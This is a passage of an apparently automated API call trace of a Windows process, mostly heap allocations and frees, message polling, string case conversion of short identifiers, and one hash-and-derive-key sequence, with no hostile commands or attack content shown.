(HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0267.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0267.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0267.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0267.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0267.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0267.406] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0267.406] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0267.406] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0267.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0267.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0267.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0267.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0267.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0267.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0267.407] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0267.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0267.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0267.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0267.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0267.407] CryptHashData (hHash=0xaa58e0, pbData=0x24b1728, dwDataLen=0x3, dwFlags=0x1) returned 1 [0267.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0267.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466dd0 [0267.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0267.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0267.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0267.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0267.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0267.407] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0267.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0267.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0267.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0267.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0267.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa808 [0267.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0267.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0267.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa00 [0267.408] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.408] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0267.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa808 [0267.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0267.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0267.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0267.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0267.408] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0267.408] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0267.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0267.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0267.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0267.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0267.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0267.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0267.409] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0267.409] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0267.409] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0267.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0267.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0267.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0267.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0267.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0267.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0267.409] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0267.409] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0267.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0267.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0267.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0267.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0267.410] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0267.410] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0267.410] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0267.410] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0267.410] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0267.410] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0267.410] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0267.410] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0267.410] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0267.410] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0267.410] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0267.410] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0267.410] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0267.410] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0267.410] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0267.410] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0267.410] CryptDeriveKey (in: hProv=0xad31c0, Algid=0x6601, hBaseData=0xaa58e0, dwFlags=0x1, phKey=0x8bef50 | out: phKey=0x8bef50*=0xaa57a0) returned 1 [0267.410] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0267.410] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0267.411] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1808 [0267.411] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0267.411] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0267.411] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0267.411] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0267.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0267.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0267.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0267.411] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0267.411] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0267.411] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0267.411] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0267.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0267.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0267.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0267.412] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0267.412] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0267.412] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0267.412] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0267.412] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0267.412] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0267.412] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0267.412] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0267.412] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0267.412] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0267.412] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0267.412] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0267.412] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0267.412] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0267.412] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0267.412] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0267.412] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0267.413] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0267.413] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0267.413] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0267.413] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0267.413] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0267.413] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0267.413] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa898 [0267.413] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0267.413] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa898 | out: hHeap=0x25c0000) returned 1 [0267.413] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0267.413] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0267.413] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0267.413] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0267.413] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0267.413] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0267.413] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0267.413] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0267.413] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0267.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0267.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0267.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0267.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0267.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0267.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0267.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0267.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0267.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0267.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0267.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0267.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0267.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0267.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0267.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0267.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0267.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0267.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0267.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0267.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0267.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0267.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0267.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0267.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0267.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0267.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0267.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0267.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f200 | out: hHeap=0x25c0000) returned 1 [0267.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0267.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0267.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0267.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0267.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0267.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0267.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0267.416] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0267.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0267.416] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.416] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0267.416] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0267.416] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0267.416] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0267.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0267.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0267.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0267.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0267.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0267.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0267.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0267.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0267.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0267.417] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0267.417] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0267.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0267.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0267.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0267.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0267.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0267.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0267.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0267.418] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0267.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0267.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0267.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0267.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0267.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0267.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0267.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0267.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0267.418] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0267.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0267.419] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0267.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0267.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0267.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0267.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0267.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0267.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0267.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0267.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0267.419] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0267.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0267.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0267.419] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0267.419] HeapFree 